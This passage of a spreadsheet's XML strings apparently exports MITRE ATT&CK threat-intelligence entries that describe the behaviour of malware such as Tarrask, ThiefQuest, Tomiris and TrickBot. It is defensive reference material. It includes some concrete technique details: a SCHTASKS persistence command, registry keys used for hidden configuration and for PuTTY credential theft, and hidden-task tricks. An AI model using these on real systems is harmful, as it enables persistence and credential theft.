    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to identify hardware information, the computer name, and OS information on an infected host.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>relationship--179538d1-5770-42ef-976f-c0fd65faa1ea</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to identify the MAC address on an infected host.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>relationship--97e042c8-f1fe-4980-bc08-86cb7c6e1fc9</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to determine local time on a compromised host.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>relationship--5c160f0c-1c12-4ab0-bd6e-a30f8d5bc168</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to capture webcam video.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>relationship--15c3f3a3-03c9-4591-a2d2-64b5eafbd4a7</t>
  </si>
  <si>
    <t>[Tarrask](https://attack.mitre.org/software/S1011) is able to create “hidden” scheduled tasks by deleting the Security Descriptor (`SD`) registry value.(Citation: Tarrask scheduled task)</t>
  </si>
  <si>
    <t>relationship--d507bcd4-bd22-4d39-b098-20c109ee9cda</t>
  </si>
  <si>
    <t>[Tarrask](https://attack.mitre.org/software/S1011) creates a scheduled task called “WinUpdate” to re-establish any dropped  C2 connections.(Citation: Tarrask scheduled task)</t>
  </si>
  <si>
    <t>relationship--6fb99c55-5c27-4069-8348-2540f10848ba</t>
  </si>
  <si>
    <t xml:space="preserve">[Tarrask](https://attack.mitre.org/software/S1011) has masqueraded as executable files such as `winupdate.exe`, `date.exe`, or `win.exe`.(Citation: Tarrask scheduled task)   </t>
  </si>
  <si>
    <t>relationship--388e6809-55d3-4689-93b1-ddd9058b965c</t>
  </si>
  <si>
    <t>[Tarrask](https://attack.mitre.org/software/S1011) is able to delete the Security Descriptor (`SD`) registry subkey in order to “hide” scheduled tasks.(Citation: Tarrask scheduled task)</t>
  </si>
  <si>
    <t>relationship--8eb5293f-e310-429c-a801-596feb3903a0</t>
  </si>
  <si>
    <t>[Tarrask](https://attack.mitre.org/software/S1011) is able to create “hidden” scheduled tasks for persistence.(Citation: Tarrask scheduled task)</t>
  </si>
  <si>
    <t>relationship--7ea59e67-c82a-4e37-b6d2-2b0b61053924</t>
  </si>
  <si>
    <t xml:space="preserve">[Tarrask](https://attack.mitre.org/software/S1011) leverages token theft to obtain `lsass.exe` security permissions.(Citation: Tarrask scheduled task) </t>
  </si>
  <si>
    <t>relationship--63f6acf5-04d5-4a77-874b-77c6416c5701</t>
  </si>
  <si>
    <t>[Tarrask](https://attack.mitre.org/software/S1011) may abuse the Windows schtasks command-line tool to create "hidden" scheduled tasks.(Citation: Tarrask scheduled task)</t>
  </si>
  <si>
    <t>relationship--3f03658e-6396-4777-adc1-4612abc54739</t>
  </si>
  <si>
    <t>[Tasklist](https://attack.mitre.org/software/S0057) can be used to discover processes running on a system.(Citation: Microsoft Tasklist)</t>
  </si>
  <si>
    <t>relationship--32a470e7-4bbc-43e8-ae8e-09b382dd441f</t>
  </si>
  <si>
    <t>[Tasklist](https://attack.mitre.org/software/S0057) can be used to enumerate security software currently running on a system by process name of known products.(Citation: Microsoft Tasklist)</t>
  </si>
  <si>
    <t>relationship--80ca0faf-6958-4158-a36d-b3e7936c5f5a</t>
  </si>
  <si>
    <t>[Tasklist](https://attack.mitre.org/software/S0057) can be used to discover services running on a system.(Citation: Microsoft Tasklist)</t>
  </si>
  <si>
    <t>relationship--40c5a024-37db-478b-b90f-27f184bf8f60</t>
  </si>
  <si>
    <t>S0595</t>
  </si>
  <si>
    <t>ThiefQuest</t>
  </si>
  <si>
    <t>malware--727afb95-3d0f-4451-b297-362a43909923</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</si>
  <si>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</si>
  <si>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relationship--96af7164-6259-42cd-9007-e882be986dfa</t>
  </si>
  <si>
    <t>21 March 2021</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</si>
  <si>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</si>
  <si>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relationship--7300af33-a55d-47a7-86a6-3b756abfc8e5</t>
  </si>
  <si>
    <t>[ThiefQuest](https://attack.mitre.org/software/S0595) encrypts a set of file extensions on a host, deletes the original files, and provides a ransom note with no contact information.(Citation: wardle evilquest partii)</t>
  </si>
  <si>
    <t>relationship--02c4488b-6041-4222-9363-18a63ce3b835</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</si>
  <si>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</si>
  <si>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relationship--e711d51c-94d3-4a20-ae11-d3584bae36d9</t>
  </si>
  <si>
    <t>[ThiefQuest](https://attack.mitre.org/software/S0595) uses the function &lt;code&gt;kill_unwanted&lt;/code&gt; to obtain a list of running processes and kills each process matching a list of security related processes.(Citation: wardle evilquest parti)</t>
  </si>
  <si>
    <t>relationship--84b5daa3-71e9-4753-b1a8-501390e3f54c</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</si>
  <si>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</si>
  <si>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relationship--7cfc1c10-b3d5-4e9e-907e-7379c3771161</t>
  </si>
  <si>
    <t>[ThiefQuest](https://attack.mitre.org/software/S0595) hides a copy of itself in the user's &lt;code&gt;~/Library&lt;/code&gt; directory by using a &lt;code&gt;.&lt;/code&gt; at the beginning of the file name followed by 9 random characters.(Citation: wardle evilquest parti)</t>
  </si>
  <si>
    <t>relationship--4306857b-542d-4a54-8b4d-b835e52c5c15</t>
  </si>
  <si>
    <t>[ThiefQuest](https://attack.mitre.org/software/S0595) can download and execute payloads in-memory or from disk.(Citation: wardle evilquest partii)</t>
  </si>
  <si>
    <t>relationship--ea4871e2-8754-4002-9e76-a2c1c0ed7e2f</t>
  </si>
  <si>
    <t>[ThiefQuest](https://attack.mitre.org/software/S0595) uses the &lt;code&gt;CGEventTap&lt;/code&gt; functions to perform keylogging.(Citation: Trendmicro Evolving ThiefQuest 2020)</t>
  </si>
  <si>
    <t>relationship--438f9fb0-bf82-4c72-8fdf-0dbc39bcf4fc</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</si>
  <si>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</si>
  <si>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relationship--979bd2a9-bc77-4741-bc79-0badc9e1e98c</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</si>
  <si>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</si>
  <si>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relationship--73798ada-f5a4-4029-ac0c-39bcae68df98</t>
  </si>
  <si>
    <t>[ThiefQuest](https://attack.mitre.org/software/S0595) prepends a copy of itself to the beginning of an executable file while maintaining the name of the executable.(Citation: wardle evilquest partii)(Citation: reed thiefquest ransomware analysis)</t>
  </si>
  <si>
    <t>relationship--75155c7f-3804-4f83-bbcb-4f654a5182e5</t>
  </si>
  <si>
    <t>[ThiefQuest](https://attack.mitre.org/software/S0595) uses various API to perform behaviors such as executing payloads and performing local enumeration.(Citation: wardle evilquest partii)</t>
  </si>
  <si>
    <t>relationship--dde881dc-6ad3-4819-b339-8019074818c7</t>
  </si>
  <si>
    <t>[ThiefQuest](https://attack.mitre.org/software/S0595) obtains a list of running processes using the function &lt;code&gt;kill_unwanted&lt;/code&gt;.(Citation: wardle evilquest parti)</t>
  </si>
  <si>
    <t>relationship--c85af3d4-ab10-4c49-91c4-bff9054096b8</t>
  </si>
  <si>
    <t>[ThiefQuest](https://attack.mitre.org/software/S0595) uses various API functions such as &lt;code&gt;NSCreateObjectFileImageFromMemory&lt;/code&gt; to load and link in-memory payloads.(Citation: wardle evilquest partii)</t>
  </si>
  <si>
    <t>relationship--d11da8db-b528-4d1f-a7f4-ba8bafb80a3d</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</si>
  <si>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</si>
  <si>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relationship--d236947c-849f-4f4f-9ee5-ab4b78d04ef6</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</si>
  <si>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</si>
  <si>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relationship--e46888e6-8c13-4a9c-8638-f8c151bec3c6</t>
  </si>
  <si>
    <t>[ThiefQuest](https://attack.mitre.org/software/S0595) uploads files via unencrypted HTTP. (Citation: wardle evilquest partii)(Citation: reed thiefquest ransomware analysis)</t>
  </si>
  <si>
    <t>relationship--30496669-0d01-4855-b566-6d5bfd9c97c1</t>
  </si>
  <si>
    <t>[ThreatNeedle](https://attack.mitre.org/software/S0665) can collect data and files from a compromised host.(Citation: Kaspersky ThreatNeedle Feb 2021)</t>
  </si>
  <si>
    <t>relationship--8f40c44c-80c5-4f9d-a467-6b71f646cdf7</t>
  </si>
  <si>
    <t>[ThreatNeedle](https://attack.mitre.org/software/S0665) can decrypt its payload using RC4, AES, or one-byte XORing.(Citation: Kaspersky ThreatNeedle Feb 2021)</t>
  </si>
  <si>
    <t>relationship--b71e10b8-e566-470b-8a5c-b634ddfd3965</t>
  </si>
  <si>
    <t>[ThreatNeedle](https://attack.mitre.org/software/S0665) can obtain file and directory information.(Citation: Kaspersky ThreatNeedle Feb 2021)</t>
  </si>
  <si>
    <t>relationship--7d584a95-3253-4093-bc03-8933374652a0</t>
  </si>
  <si>
    <t>[ThreatNeedle](https://attack.mitre.org/software/S0665) can save its configuration data as a RC4-encrypted Registry key under `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\GameCon`.(Citation: Kaspersky ThreatNeedle Feb 2021)</t>
  </si>
  <si>
    <t>relationship--9de8aee7-1867-48a4-9a78-3076853e43ac</t>
  </si>
  <si>
    <t>[ThreatNeedle](https://attack.mitre.org/software/S0665) can download additional tools to enable lateral movement.(Citation: Kaspersky ThreatNeedle Feb 2021)</t>
  </si>
  <si>
    <t>relationship--4e49358b-43d4-4fc6-8ad0-72882de328b4</t>
  </si>
  <si>
    <t>[ThreatNeedle](https://attack.mitre.org/software/S0665) relies on a victim to click on a malicious document for initial execution.(Citation: Kaspersky ThreatNeedle Feb 2021)</t>
  </si>
  <si>
    <t>relationship--3da23733-c783-4743-8238-5fc96714409b</t>
  </si>
  <si>
    <t>[ThreatNeedle](https://attack.mitre.org/software/S0665) chooses its payload creation path from a randomly selected service name from netsvc.(Citation: Kaspersky ThreatNeedle Feb 2021)</t>
  </si>
  <si>
    <t>relationship--cebd1b11-835d-4d96-b1cf-7836bf50f403</t>
  </si>
  <si>
    <t>[ThreatNeedle](https://attack.mitre.org/software/S0665) can modify the Registry to save its configuration data as the following RC4-encrypted Registry key: `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\GameCon`.(Citation: Kaspersky ThreatNeedle Feb 2021)</t>
  </si>
  <si>
    <t>relationship--a5f5eee7-6cc2-4eb4-b918-fc771b927abc</t>
  </si>
  <si>
    <t>[ThreatNeedle](https://attack.mitre.org/software/S0665) has been compressed and obfuscated using RC4, AES, or XOR.(Citation: Kaspersky ThreatNeedle Feb 2021)</t>
  </si>
  <si>
    <t>relationship--93be81ec-3e56-4257-b869-37bcec2c2625</t>
  </si>
  <si>
    <t>[ThreatNeedle](https://attack.mitre.org/software/S0665) can be loaded into the Startup folder (`%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\OneDrives.lnk`) as a Shortcut file for persistence.(Citation: Kaspersky ThreatNeedle Feb 2021)</t>
  </si>
  <si>
    <t>relationship--25d44b9e-3645-4fe7-96b0-3c2c31b90ac0</t>
  </si>
  <si>
    <t xml:space="preserve">[ThreatNeedle](https://attack.mitre.org/software/S0665) has been distributed via a malicious Word document within a spearphishing email.(Citation: Kaspersky ThreatNeedle Feb 2021) </t>
  </si>
  <si>
    <t>relationship--c91113cc-70d5-4daa-8283-d79898502be8</t>
  </si>
  <si>
    <t>[ThreatNeedle](https://attack.mitre.org/software/S0665) can collect system profile information from a compromised host.(Citation: Kaspersky ThreatNeedle Feb 2021)</t>
  </si>
  <si>
    <t>relationship--53d7fdab-05fb-4427-b0e0-11463e05b3f3</t>
  </si>
  <si>
    <t>[ThreatNeedle](https://attack.mitre.org/software/S0665) can run in memory and register its payload as a Windows service.(Citation: Kaspersky ThreatNeedle Feb 2021)</t>
  </si>
  <si>
    <t>relationship--451e231b-a523-4ee9-be5e-1e80cef9c8fa</t>
  </si>
  <si>
    <t>[TinyTurla](https://attack.mitre.org/software/S0668) has the ability to encrypt C2 traffic with SSL/TLS.(Citation: Talos TinyTurla September 2021)</t>
  </si>
  <si>
    <t>relationship--16d07e92-1026-4d2f-ad4d-a1cb664d1278</t>
  </si>
  <si>
    <t>[TinyTurla](https://attack.mitre.org/software/S0668) can upload files from a compromised host.(Citation: Talos TinyTurla September 2021)</t>
  </si>
  <si>
    <t>relationship--b7c40c13-6b20-4470-a715-04b5fa01ef24</t>
  </si>
  <si>
    <t>[TinyTurla](https://attack.mitre.org/software/S0668) can go through a list of C2 server IPs and will try to register with each until one responds.(Citation: Talos TinyTurla September 2021)</t>
  </si>
  <si>
    <t>relationship--b4642810-53c4-4ff2-859f-f4b707a36097</t>
  </si>
  <si>
    <t>[TinyTurla](https://attack.mitre.org/software/S0668) can save its configuration parameters in the Registry.(Citation: Talos TinyTurla September 2021)</t>
  </si>
  <si>
    <t>relationship--73aee1df-5faf-456f-8bde-74b531c1c2b9</t>
  </si>
  <si>
    <t>[TinyTurla](https://attack.mitre.org/software/S0668) has the ability to act as a second-stage dropper used to infect the system with additional malware.(Citation: Talos TinyTurla September 2021)</t>
  </si>
  <si>
    <t>relationship--72ec975a-43b4-4766-a2f4-385b6112858d</t>
  </si>
  <si>
    <t>[TinyTurla](https://attack.mitre.org/software/S0668) has mimicked an existing Windows service by being installed as &lt;code&gt;Windows Time Service&lt;/code&gt;.(Citation: Talos TinyTurla September 2021)</t>
  </si>
  <si>
    <t>relationship--7e588158-1962-42d4-b836-0a2c764fdc5e</t>
  </si>
  <si>
    <t>[TinyTurla](https://attack.mitre.org/software/S0668) has been deployed as `w64time.dll` to appear legitimate.(Citation: Talos TinyTurla September 2021)</t>
  </si>
  <si>
    <t>relationship--1e1045dd-0ae7-427e-a205-d41c88b0a5d9</t>
  </si>
  <si>
    <t>[TinyTurla](https://attack.mitre.org/software/S0668) can set its configuration parameters in the Registry.(Citation: Talos TinyTurla September 2021)</t>
  </si>
  <si>
    <t>relationship--2f603550-4368-4f34-89d9-50f69eed2fa9</t>
  </si>
  <si>
    <t>[TinyTurla](https://attack.mitre.org/software/S0668) has used `WinHTTP`, `CreateProcess`, and other APIs for C2 communications and other functions.(Citation: Talos TinyTurla September 2021)</t>
  </si>
  <si>
    <t>relationship--1a471326-20d2-41e2-8dc5-dd9d9ce5a7e1</t>
  </si>
  <si>
    <t>[TinyTurla](https://attack.mitre.org/software/S0668) can query the Registry for its configuration information.(Citation: Talos TinyTurla September 2021)</t>
  </si>
  <si>
    <t>relationship--b33486bc-c7f4-46d7-9e20-3863c5508820</t>
  </si>
  <si>
    <t>[TinyTurla](https://attack.mitre.org/software/S0668) contacts its C2 based on a scheduled timing set in its configuration.(Citation: Talos TinyTurla September 2021)</t>
  </si>
  <si>
    <t>relationship--a6af8abf-a60f-47f7-9112-aa527db087c7</t>
  </si>
  <si>
    <t>[TinyTurla](https://attack.mitre.org/software/S0668) can install itself as a service on compromised machines.(Citation: Talos TinyTurla September 2021)</t>
  </si>
  <si>
    <t>relationship--2ebf0505-4b0a-4e17-b303-b860585f7c11</t>
  </si>
  <si>
    <t>[TinyTurla](https://attack.mitre.org/software/S0668) can use HTTPS in C2 communications.(Citation: Talos TinyTurla September 2021)</t>
  </si>
  <si>
    <t>relationship--e6f09187-694f-4be9-9617-e93ab25ff9a7</t>
  </si>
  <si>
    <t>[TinyTurla](https://attack.mitre.org/software/S0668) has been installed using a .bat file.(Citation: Talos TinyTurla September 2021)</t>
  </si>
  <si>
    <t>relationship--5c2fe9e9-cb7e-418a-84f1-9966854b4c27</t>
  </si>
  <si>
    <t>[TinyZBot](https://attack.mitre.org/software/S0004) contains functionality to collect information from the clipboard.(Citation: Cylance Cleaver)</t>
  </si>
  <si>
    <t>relationship--35ca6c35-f1e9-49b7-a8c9-a67951c57ea0</t>
  </si>
  <si>
    <t>[TinyZBot](https://attack.mitre.org/software/S0004) can disable Avira anti-virus.(Citation: Cylance Cleaver)</t>
  </si>
  <si>
    <t>relationship--bdde6ad0-b6eb-4e3a-80e4-8a9db6a9570d</t>
  </si>
  <si>
    <t>[TinyZBot](https://attack.mitre.org/software/S0004) contains keylogger functionality.(Citation: Cylance Cleaver)</t>
  </si>
  <si>
    <t>relationship--d8f5283b-fe44-4206-8a7d-393d216beb7e</t>
  </si>
  <si>
    <t>[TinyZBot](https://attack.mitre.org/software/S0004) can create a shortcut in the Windows startup folder for persistence.(Citation: Cylance Cleaver)</t>
  </si>
  <si>
    <t>relationship--aeaa2f37-4014-4313-9fe2-8616b352a90c</t>
  </si>
  <si>
    <t>[TinyZBot](https://attack.mitre.org/software/S0004) contains screen capture functionality.(Citation: Cylance Cleaver)</t>
  </si>
  <si>
    <t>relationship--6f01abdc-bd94-4645-afed-8d3bd365bba4</t>
  </si>
  <si>
    <t>relationship--8ce2219f-6c25-46a2-8215-a78871e2773a</t>
  </si>
  <si>
    <t>[TinyZBot](https://attack.mitre.org/software/S0004) supports execution from the command-line.(Citation: Cylance Cleaver)</t>
  </si>
  <si>
    <t>relationship--fdc4c379-e6e6-4454-933d-2a9a4a78cf98</t>
  </si>
  <si>
    <t>[TinyZBot](https://attack.mitre.org/software/S0004) can install as a Windows service for persistence.(Citation: Cylance Cleaver)</t>
  </si>
  <si>
    <t>relationship--90347c97-c0c5-4407-9087-b917d0789b0e</t>
  </si>
  <si>
    <t>S0671</t>
  </si>
  <si>
    <t>Tomiris</t>
  </si>
  <si>
    <t>malware--327b3a25-9e60-4431-b3b6-93b9c64eacbc</t>
  </si>
  <si>
    <t>[Tomiris](https://attack.mitre.org/software/S0671) has the ability to collect recent files matching a hardcoded list of extensions prior to exfiltration.(Citation: Kaspersky Tomiris Sep 2021)</t>
  </si>
  <si>
    <t>relationship--6eb962fa-ca3e-4af2-9243-132c666a5c25</t>
  </si>
  <si>
    <t>[Tomiris](https://attack.mitre.org/software/S0671) has connected to a signalization server that provides a URL and port, and then [Tomiris](https://attack.mitre.org/software/S0671) sends a GET request to that URL to establish C2.(Citation: Kaspersky Tomiris Sep 2021)</t>
  </si>
  <si>
    <t>relationship--03f288cd-a189-4de9-abd4-6b10bda138a4</t>
  </si>
  <si>
    <t xml:space="preserve"> [Tomiris](https://attack.mitre.org/software/S0671) can upload files matching a hardcoded set of extensions, such as .doc, .docx, .pdf, and .rar, to its C2 server.(Citation: Kaspersky Tomiris Sep 2021)</t>
  </si>
  <si>
    <t>relationship--c902576b-935e-4c1c-ae81-5d878e0ebaa0</t>
  </si>
  <si>
    <t>29 December 2021</t>
  </si>
  <si>
    <t>[Tomiris](https://attack.mitre.org/software/S0671) can download files and execute them on a victim's system.(Citation: Kaspersky Tomiris Sep 2021)</t>
  </si>
  <si>
    <t>relationship--9e0bef30-edc0-4a18-9033-a1f487e35b76</t>
  </si>
  <si>
    <t>[Tomiris](https://attack.mitre.org/software/S0671) has used `SCHTASKS /CREATE /SC DAILY /TN StartDVL /TR "[path to self]" /ST 10:00` to establish persistence.(Citation: Kaspersky Tomiris Sep 2021)</t>
  </si>
  <si>
    <t>relationship--43ae357d-d0f8-4cdc-a9d6-0f10f603707c</t>
  </si>
  <si>
    <t>[Tomiris](https://attack.mitre.org/software/S0671) has been packed with UPX.(Citation: Kaspersky Tomiris Sep 2021)</t>
  </si>
  <si>
    <t>relationship--63e47b19-5fe4-485d-9544-ab90a66edf6d</t>
  </si>
  <si>
    <t>[Tomiris](https://attack.mitre.org/software/S0671) has the ability to sleep for at least nine minutes to evade sandbox-based analysis systems.(Citation: Kaspersky Tomiris Sep 2021)</t>
  </si>
  <si>
    <t>relationship--5970c81f-932b-47e9-a63b-b4e30c351e7f</t>
  </si>
  <si>
    <t>[Tomiris](https://attack.mitre.org/software/S0671) can use HTTP to establish C2 communications.(Citation: Kaspersky Tomiris Sep 2021)</t>
  </si>
  <si>
    <t>relationship--30565d66-2743-4e39-81ce-bc861149ce1e</t>
  </si>
  <si>
    <t>[Tor](https://attack.mitre.org/software/S0183) encapsulates traffic in multiple layers of encryption, using TLS by default.(Citation: Dingledine Tor The Second-Generation Onion Router)</t>
  </si>
  <si>
    <t>relationship--74486fa3-a5b8-49b2-82b7-0c453b4baf12</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</si>
  <si>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</si>
  <si>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relationship--92e4cc06-5708-4486-92cc-0d25d9a755d4</t>
  </si>
  <si>
    <t>[Torisma](https://attack.mitre.org/software/S0678) has used XOR and Base64 to decode C2 data.(Citation: McAfee Lazarus Nov 2020)</t>
  </si>
  <si>
    <t>relationship--512b3fed-39aa-407d-b274-5a65229688b7</t>
  </si>
  <si>
    <t>[Torisma](https://attack.mitre.org/software/S0678) is only delivered to a compromised host if the victim's IP address is on an allow-list.(Citation: McAfee Lazarus Nov 2020)</t>
  </si>
  <si>
    <t>relationship--37599333-0974-4442-976e-6f8d8c3ceac7</t>
  </si>
  <si>
    <t>[Torisma](https://attack.mitre.org/software/S0678) can send victim data to an actor-controlled C2 server.(Citation: McAfee Lazarus Nov 2020)</t>
  </si>
  <si>
    <t>relationship--21900cf5-72e2-4661-b137-0753710b4f9d</t>
  </si>
  <si>
    <t>[Torisma](https://attack.mitre.org/software/S0678) has used various Windows API calls.(Citation: McAfee Lazarus Nov 2020)</t>
  </si>
  <si>
    <t>relationship--0872f093-cfab-4e63-bfde-b7748808c96f</t>
  </si>
  <si>
    <t>[Torisma](https://attack.mitre.org/software/S0678) has been Base64 encoded and AES encrypted.(Citation: McAfee Lazarus Nov 2020)</t>
  </si>
  <si>
    <t>relationship--00f44cd5-9afc-472f-9743-251d243798a0</t>
  </si>
  <si>
    <t>[Torisma](https://attack.mitre.org/software/S0678) has been packed with Iz4 compression.(Citation: McAfee Lazarus Nov 2020)</t>
  </si>
  <si>
    <t>relationship--7226ed2f-506e-4608-913f-953aca532413</t>
  </si>
  <si>
    <t>[Torisma](https://attack.mitre.org/software/S0678) has encoded C2 communications with Base64.(Citation: McAfee Lazarus Nov 2020)</t>
  </si>
  <si>
    <t>relationship--261937ca-8c05-430a-9c85-280b78505f65</t>
  </si>
  <si>
    <t>[Torisma](https://attack.mitre.org/software/S0678) has encrypted its C2 communications using XOR and VEST-32.(Citation: McAfee Lazarus Nov 2020)</t>
  </si>
  <si>
    <t>relationship--773ba80b-0dbc-4ed9-9fbb-bcfef08da01d</t>
  </si>
  <si>
    <t>[Torisma](https://attack.mitre.org/software/S0678) can use `GetlogicalDrives` to get a bitmask of all drives available on a compromised system. It can also use `GetDriveType` to determine if a new drive is a CD-ROM drive.(Citation: McAfee Lazarus Nov 2020)</t>
  </si>
  <si>
    <t>relationship--0b6312e1-2601-4bb3-ba21-ee1c488b3506</t>
  </si>
  <si>
    <t>[Torisma](https://attack.mitre.org/software/S0678) can collect the local MAC address using `GetAdaptersInfo` as well as the system's IP address.(Citation: McAfee Lazarus Nov 2020)</t>
  </si>
  <si>
    <t>relationship--f5cc5037-067a-4e29-90c4-775152d76a8f</t>
  </si>
  <si>
    <t>[Torisma](https://attack.mitre.org/software/S0678) can use `WTSEnumerateSessionsW` to monitor remote desktop connections.(Citation: McAfee Lazarus Nov 2020)</t>
  </si>
  <si>
    <t>relationship--438c4a38-3043-4697-8490-d63fcbc63cd8</t>
  </si>
  <si>
    <t>[Torisma](https://attack.mitre.org/software/S0678) can collect the current time on a victim machine.(Citation: McAfee Lazarus Nov 2020)</t>
  </si>
  <si>
    <t>relationship--1a192f9a-d515-4d5c-9c52-e904bac96f61</t>
  </si>
  <si>
    <t>[Torisma](https://attack.mitre.org/software/S0678) can use HTTP and HTTPS for C2 communications.(Citation: McAfee Lazarus Nov 2020)</t>
  </si>
  <si>
    <t>relationship--88a4b1b5-770c-4af3-afe8-bd98076f448f</t>
  </si>
  <si>
    <t>[TrailBlazer](https://attack.mitre.org/software/S0682) can masquerade its C2 traffic as legitimate Google Notifications HTTP requests.(Citation: CrowdStrike StellarParticle January 2022)</t>
  </si>
  <si>
    <t>relationship--7bade69a-16f3-4d2d-bec5-c7dc76358787</t>
  </si>
  <si>
    <t>[TrailBlazer](https://attack.mitre.org/software/S0682) has used random identifier strings to obscure its C2 operations and result codes.(Citation: CrowdStrike StellarParticle January 2022)</t>
  </si>
  <si>
    <t>relationship--3a6a0b1a-55bf-4475-9eea-b00639367fab</t>
  </si>
  <si>
    <t>[TrailBlazer](https://attack.mitre.org/software/S0682) has used filenames that match the name of the compromised system in attempt to avoid detection.(Citation: CrowdStrike StellarParticle January 2022)</t>
  </si>
  <si>
    <t>relationship--eca68811-ebe9-4ee0-8fb0-afa5975eb938</t>
  </si>
  <si>
    <t>[TrailBlazer](https://attack.mitre.org/software/S0682) has used HTTP requests for C2.(Citation: CrowdStrike StellarParticle January 2022)</t>
  </si>
  <si>
    <t>relationship--9199705b-d90f-4f46-908a-e419501c8712</t>
  </si>
  <si>
    <t>[TrailBlazer](https://attack.mitre.org/software/S0682) has the ability to use WMI for persistence.(Citation: CrowdStrike StellarParticle January 2022)</t>
  </si>
  <si>
    <t>relationship--fd1e07f7-2ec2-4af3-a90c-17d142bd8fa8</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) can implant malicious code into a compromised device's firmware.(Citation: Eclypsium Trickboot December 2020)</t>
  </si>
  <si>
    <t>relationship--20adc21a-7721-470f-82d4-8a4cfb59a8c1</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</si>
  <si>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</si>
  <si>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relationship--20cf444d-b538-4971-b054-3d749aa945f0</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) has come with a signed downloader component.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>relationship--c94a3ac7-1f05-460b-9bff-67fafd260e01</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) used COM to setup scheduled task for persistence.(Citation: ESET Trickbot Oct 2020)</t>
  </si>
  <si>
    <t>relationship--17525c42-6859-4175-841c-272e85f68be9</t>
  </si>
  <si>
    <t xml:space="preserve">[TrickBot](https://attack.mitre.org/software/S0266) has the ability to capture RDP credentials by capturing the &lt;code&gt;CredEnumerateA&lt;/code&gt; API(Citation: TrendMicro Trickbot Feb 2019) </t>
  </si>
  <si>
    <t>relationship--ce44b002-2ef5-4740-a39e-1e58c2817955</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) uses brute-force attack against RDP with rdpscanDll module.(Citation: ESET Trickbot Oct 2020)(Citation: Bitdefender Trickbot March 2020)</t>
  </si>
  <si>
    <t>relationship--c9932124-c6dd-4c26-a762-bde5be25bed7</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</si>
  <si>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</si>
  <si>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relationship--5b2f0fb3-5877-4fa2-bed1-1962423caccd</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</si>
  <si>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</si>
  <si>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relationship--f0dd2703-4846-47b5-a8d8-471f70f9968e</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) has retrieved PuTTY credentials by querying the &lt;code&gt;Software\SimonTatham\Putty\Sessions&lt;/code&gt; registry key (Citation: TrendMicro Trickbot Feb 2019)</t>
  </si>
  <si>
    <t>relationship--91cff72f-644b-42e3-9c86-8cc6475f725a</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) collects local files and information from the victim’s local machine.(Citation: S2 Grupo TrickBot June 2017)</t>
  </si>
  <si>
    <t>relationship--7ecd1b78-a3f1-4997-be47-68377eb59689</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) decodes the configuration data and modules.(Citation: Fidelis TrickBot Oct 2016)(Citation: Cyberreason Anchor December 2019)(Citation: Joe Sec Trickbot)</t>
  </si>
  <si>
    <t>relationship--af7c56df-ced8-45b7-9aef-be1039e30cea</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) can disable Windows Defender.(Citation: Trend Micro Trickbot Nov 2018)</t>
  </si>
  <si>
    <t>relationship--875c4506-3c41-4b4d-bdc9-aa66614cfa55</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) can gather information about domain trusts by utilizing [Nltest](https://attack.mitre.org/software/S0359).(Citation: Fortinet TrickBot)(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>relationship--f4d15148-3a41-4fbc-a42e-59379724acc5</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) collects email addresses from Outlook.(Citation: Trend Micro Trickbot Nov 2018)</t>
  </si>
  <si>
    <t>relationship--9b5e38b3-31b5-4734-bef2-c05904479430</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) can send information about the compromised host and upload data to a hardcoded C2 server.(Citation: Cyberreason Anchor December 2019)(Citation: Bitdefender Trickbot VNC module Whitepaper 2021)</t>
  </si>
  <si>
    <t>relationship--3ed5a1c3-e7c8-4fb7-bfcf-401b29f5f47c</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) utilizes EternalBlue and EternalRomance exploits for lateral movement in the modules wormwinDll, wormDll, mwormDll, nwormDll, tabDll.(Citation: ESET Trickbot Oct 2020)</t>
  </si>
  <si>
    <t>relationship--e56f602c-ec9f-46f0-a52f-45b90220314e</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) has been known to reach a command and control server via one of nine proxy IP addresses. (Citation: Bitdefender Trickbot C2 infra Nov 2020) (Citation: Bitdefender Trickbot VNC module Whitepaper 2021)</t>
  </si>
  <si>
    <t>relationship--e014c5a8-f9bc-4de5-aa46-55765ac4461c</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) can use secondary C2 servers for communication after establishing connectivity and relaying victim information to primary C2 servers.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>relationship--3fa8155d-11ca-47de-902e-47e809d0ed64</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</si>
  <si>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</si>
  <si>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relationship--caef212a-7ed2-4cb9-a155-7ce79a9784b8</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) module "Trickboot" can write or erase the UEFI/BIOS firmware of a compromised device.(Citation: Eclypsium Trickboot December 2020)</t>
  </si>
  <si>
    <t>relationship--acece0c4-4c9e-4c11-a57a-f01bb23abbf7</t>
  </si>
  <si>
